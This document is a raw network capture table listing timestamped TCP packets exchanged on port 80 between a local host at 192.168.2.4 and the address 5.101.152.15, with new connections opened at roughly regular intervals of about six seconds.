Jan 5, 2025 18:58:16.149966002 CET	80	49844	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:16.150036097 CET	49844	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:16.150489092 CET	80	49878	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:16.150556087 CET	49878	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:16.150679111 CET	49878	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:16.155472040 CET	80	49878	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:16.155481100 CET	80	49878	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:16.155519962 CET	80	49878	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:16.894395113 CET	80	49878	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:16.941443920 CET	49878	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:21.910588980 CET	49878	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:21.911261082 CET	49915	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:21.915695906 CET	80	49878	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:21.915798903 CET	49878	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:21.916074038 CET	80	49915	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:21.916210890 CET	49915	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:21.916296005 CET	49915	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:21.921199083 CET	80	49915	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:21.921210051 CET	80	49915	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:21.921217918 CET	80	49915	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:22.625699043 CET	80	49915	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:22.627865076 CET	49915	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:22.633112907 CET	80	49915	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:22.633304119 CET	49915	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:27.630275011 CET	49953	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:27.635067940 CET	80	49953	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:27.635128975 CET	49953	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:27.635389090 CET	49953	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:27.640243053 CET	80	49953	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:27.640254974 CET	80	49953	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:27.640264988 CET	80	49953	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:28.406780958 CET	80	49953	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:28.472732067 CET	49953	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:33.410646915 CET	49953	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:33.411329985 CET	49989	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:33.415668964 CET	80	49953	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:33.415735006 CET	49953	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:33.416137934 CET	80	49989	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:33.416202068 CET	49989	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:33.416500092 CET	49989	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:33.421403885 CET	80	49989	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:33.421416044 CET	80	49989	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:33.421454906 CET	80	49989	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:34.156667948 CET	80	49989	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:34.238538980 CET	49989	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:39.161195993 CET	49989	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:39.162290096 CET	50025	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:39.166315079 CET	80	49989	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:39.166511059 CET	49989	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:39.167098999 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:39.167159081 CET	50025	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:39.167292118 CET	50025	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:39.172115088 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:39.172127008 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:39.172137976 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:39.907494068 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:40.066435099 CET	50025	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:41.489361048 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:41.489427090 CET	50025	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:44.910912991 CET	50025	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:44.911660910 CET	50026	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:44.915831089 CET	80	50025	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:44.916505098 CET	80	50026	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:44.918592930 CET	50026	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:44.919692993 CET	50026	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:44.924571037 CET	80	50026	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:44.924582005 CET	80	50026	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:44.924591064 CET	80	50026	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:45.674732924 CET	80	50026	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:45.737824917 CET	50026	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:50.680213928 CET	50026	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:50.681034088 CET	50027	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:50.685317039 CET	80	50026	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:50.685365915 CET	50026	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:50.685837984 CET	80	50027	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:50.685903072 CET	50027	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:50.686085939 CET	50027	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:50.690951109 CET	80	50027	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:50.690962076 CET	80	50027	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:50.690970898 CET	80	50027	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:51.476763010 CET	80	50027	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:51.628963947 CET	50027	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:56.488989115 CET	50027	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:56.489655972 CET	50028	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:56.494424105 CET	80	50028	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:56.494528055 CET	50028	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:56.494642019 CET	50028	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:56.494695902 CET	80	50027	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:56.498532057 CET	50027	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:58:56.499507904 CET	80	50028	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:56.499516964 CET	80	50028	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:56.499526978 CET	80	50028	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:57.233858109 CET	80	50028	5.101.152.15	192.168.2.4
Jan 5, 2025 18:58:57.342199087 CET	50028	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:02.266762972 CET	50028	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:02.271843910 CET	80	50028	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:02.272223949 CET	50028	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:02.990633011 CET	50029	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:02.995368958 CET	80	50029	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:02.995440006 CET	50029	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:02.995815992 CET	50029	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:03.000586987 CET	80	50029	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:03.000597000 CET	80	50029	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:03.000603914 CET	80	50029	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:03.831329107 CET	80	50029	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:03.925826073 CET	50029	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:08.832441092 CET	50029	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:08.833107948 CET	50030	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:08.837611914 CET	80	50029	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:08.837694883 CET	50029	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:08.837869883 CET	80	50030	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:08.840625048 CET	50030	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:08.840745926 CET	50030	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:08.845598936 CET	80	50030	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:08.845623970 CET	80	50030	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:08.845668077 CET	80	50030	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:09.642075062 CET	80	50030	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:09.738217115 CET	50030	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:14.645562887 CET	50030	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:14.647149086 CET	50031	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:14.652013063 CET	80	50031	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:14.652076960 CET	50031	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:14.652260065 CET	50031	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:14.653872967 CET	80	50030	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:14.653922081 CET	50030	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:14.657080889 CET	80	50031	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:14.657090902 CET	80	50031	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:14.657099009 CET	80	50031	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:15.424069881 CET	80	50031	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:15.472599030 CET	50031	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:20.426213980 CET	50031	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:20.426923037 CET	50032	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:20.434384108 CET	80	50031	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:20.434478045 CET	50031	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:20.434798002 CET	80	50032	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:20.434864998 CET	50032	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:20.435005903 CET	50032	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:20.442950010 CET	80	50032	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:20.442961931 CET	80	50032	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:20.442970991 CET	80	50032	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:21.194750071 CET	80	50032	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:21.378827095 CET	50032	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:26.207392931 CET	50032	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:26.208143950 CET	50033	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:26.212716103 CET	80	50032	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:26.212784052 CET	50032	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:26.213066101 CET	80	50033	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:26.213150978 CET	50033	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:26.213320971 CET	50033	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:26.218075991 CET	80	50033	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:26.218168020 CET	80	50033	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:26.218184948 CET	80	50033	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:27.236001968 CET	80	50033	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:27.335566044 CET	50033	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:32.420717001 CET	50033	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:32.425957918 CET	80	50033	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:32.428360939 CET	50033	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:32.448602915 CET	50034	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:32.453425884 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:32.456562042 CET	50034	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:32.460109949 CET	50034	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:32.465033054 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:32.465044022 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:32.465053082 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:33.201106071 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:33.417622089 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:33.418255091 CET	50034	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:38.232963085 CET	50034	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:38.233721018 CET	50035	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:38.238126993 CET	80	50034	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:38.238429070 CET	50034	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:38.238482952 CET	80	50035	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:38.238539934 CET	50035	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:38.242614985 CET	50035	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:38.247483969 CET	80	50035	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:38.247497082 CET	80	50035	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:38.247509003 CET	80	50035	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:38.978365898 CET	80	50035	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:39.066302061 CET	50035	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:43.994657993 CET	50035	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:43.999841928 CET	80	50035	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:44.002424955 CET	50035	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:44.005789995 CET	50036	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:44.010646105 CET	80	50036	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:44.014453888 CET	50036	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:44.016829014 CET	50036	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:44.021698952 CET	80	50036	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:44.021712065 CET	80	50036	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:44.021719933 CET	80	50036	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:45.185847998 CET	80	50036	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:45.238174915 CET	50036	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:50.191998005 CET	50036	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:50.193130016 CET	50037	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:50.197149038 CET	80	50036	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:50.197197914 CET	50036	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:50.197987080 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:50.198050022 CET	50037	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:50.198167086 CET	50037	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:50.202997923 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:50.203008890 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:50.203023911 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:50.945475101 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:51.155678988 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:51.155751944 CET	50037	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:55.957531929 CET	50037	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:55.958764076 CET	50038	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:55.962601900 CET	80	50037	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:55.962652922 CET	50037	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:55.963546991 CET	80	50038	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:55.963689089 CET	50038	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:55.963972092 CET	50038	80	192.168.2.4	5.101.152.15
Jan 5, 2025 18:59:55.968802929 CET	80	50038	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:55.968815088 CET	80	50038	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:55.968822956 CET	80	50038	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:56.721702099 CET	80	50038	5.101.152.15	192.168.2.4
Jan 5, 2025 18:59:56.863231897 CET	50038	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:01.748653889 CET	50038	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:01.752912045 CET	50039	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:01.753891945 CET	80	50038	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:01.753935099 CET	50038	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:01.757688046 CET	80	50039	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:01.757746935 CET	50039	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:01.758035898 CET	50039	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:01.762873888 CET	80	50039	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:01.762883902 CET	80	50039	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:01.762892008 CET	80	50039	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:02.503570080 CET	80	50039	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:02.628773928 CET	50039	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:07.519809961 CET	50039	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:07.520494938 CET	50040	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:07.524878979 CET	80	50039	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:07.524930954 CET	50039	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:07.525288105 CET	80	50040	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:07.525590897 CET	50040	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:07.525902987 CET	50040	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:07.530755043 CET	80	50040	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:07.530769110 CET	80	50040	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:07.530778885 CET	80	50040	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:08.248733044 CET	80	50040	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:08.378808022 CET	50040	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:13.269151926 CET	50040	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:13.274262905 CET	80	50040	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:13.274338961 CET	50040	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:13.282721043 CET	50041	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:13.287503004 CET	80	50041	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:13.287586927 CET	50041	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:13.289949894 CET	50041	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:13.294754028 CET	80	50041	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:13.294770002 CET	80	50041	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:13.294779062 CET	80	50041	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:14.130461931 CET	80	50041	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:14.238146067 CET	50041	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:19.144762039 CET	50041	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:19.145514011 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:19.150307894 CET	80	50041	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:19.150383949 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:19.150470972 CET	50041	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:19.150473118 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:19.150630951 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:19.155479908 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:19.155507088 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:19.155515909 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:19.919224024 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:20.128779888 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:20.133548021 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:20.133600950 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:24.926136971 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:24.926896095 CET	50043	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:24.931828976 CET	80	50043	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:24.934370995 CET	50043	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:24.934535027 CET	50043	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:24.939481020 CET	80	50043	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:24.939610004 CET	80	50043	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:24.939620018 CET	80	50043	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:24.943730116 CET	80	50042	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:24.946355104 CET	50042	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:25.732461929 CET	80	50043	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:25.878750086 CET	50043	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:30.801035881 CET	50043	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:30.801713943 CET	50044	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:30.806202888 CET	80	50043	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:30.806477070 CET	80	50044	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:30.806534052 CET	50043	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:30.806569099 CET	50044	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:30.806684017 CET	50044	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:30.812222958 CET	80	50044	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:30.812232971 CET	80	50044	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:30.812242031 CET	80	50044	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:31.553881884 CET	80	50044	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:31.631055117 CET	50044	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:36.567415953 CET	50045	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:36.567419052 CET	50044	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:36.572308064 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:36.572458029 CET	50045	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:36.572534084 CET	80	50044	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:36.572649956 CET	50044	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:36.572999954 CET	50045	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:36.577740908 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:36.577765942 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:36.577775002 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:37.390316010 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:37.472491980 CET	50045	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:41.368333101 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:41.368383884 CET	50045	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:42.394814014 CET	50045	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:42.397484064 CET	50046	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:42.399698019 CET	80	50045	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:42.402321100 CET	80	50046	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:42.402422905 CET	50046	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:42.402553082 CET	50046	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:42.407407045 CET	80	50046	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:42.407418013 CET	80	50046	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:42.407427073 CET	80	50046	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:43.120800018 CET	80	50046	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:43.175618887 CET	50046	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:48.129307985 CET	50046	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:48.130048037 CET	50047	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:48.134426117 CET	80	50046	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:48.134507895 CET	50046	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:48.134917974 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:48.134978056 CET	50047	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:48.135102987 CET	50047	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:48.139924049 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:48.139939070 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:48.139950037 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:49.004349947 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:49.113384008 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:49.113441944 CET	50047	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:54.019769907 CET	50047	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:54.020381927 CET	50048	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:54.024931908 CET	80	50047	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:54.025187969 CET	80	50048	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:54.025250912 CET	50047	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:54.025285006 CET	50048	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:54.025429964 CET	50048	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:54.030297041 CET	80	50048	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:54.030307055 CET	80	50048	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:54.030316114 CET	80	50048	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:54.785201073 CET	80	50048	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:54.878743887 CET	50048	80	192.168.2.4	5.101.152.15
